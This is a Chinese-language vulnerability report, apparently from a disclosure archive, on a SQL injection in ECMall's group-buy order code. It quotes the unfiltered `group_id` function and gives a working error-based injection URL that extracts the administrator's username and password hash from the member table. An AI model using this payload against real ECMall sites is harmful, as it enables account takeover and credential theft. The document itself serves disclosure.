### 简要描述:
没有看到补丁,应该没有补吧
### 详细说明:
漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤
```
function _clear_goods($order_id)
{
switch ($_GET['goods'])
{
case 'groupbuy':
/* 团购的商品 */
$model_groupbuy =& m('groupbuy');
$model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array(
'order_id' => $order_id,
));//这里没有对$_GET['group_id']进行过滤
break;
}
}
```
### 漏洞证明:
首先参加一个团购活动,当团购活动结束后,点击购买
[<img src="https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png" alt="t0140787235ff0effad.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png)
点下一步时,更改当前网址如:http://192.168.1.1:8000/ecmall/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
[<img src="https://images.seebug.org/upload/201401/15094828c70c178be4ef1a4c4c3a8bc205cb0307.png" alt="t018946aaac63adb74c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15094828c70c178be4ef1a4c4c3a8bc205cb0307.png)
然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等
[<img src="https://images.seebug.org/upload/201401/15094900477bd4462b5f4ce29d041c5704bf6a11.png" alt="t018b2e61988452dfa6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15094900477bd4462b5f4ce29d041c5704bf6a11.png)
暂无评论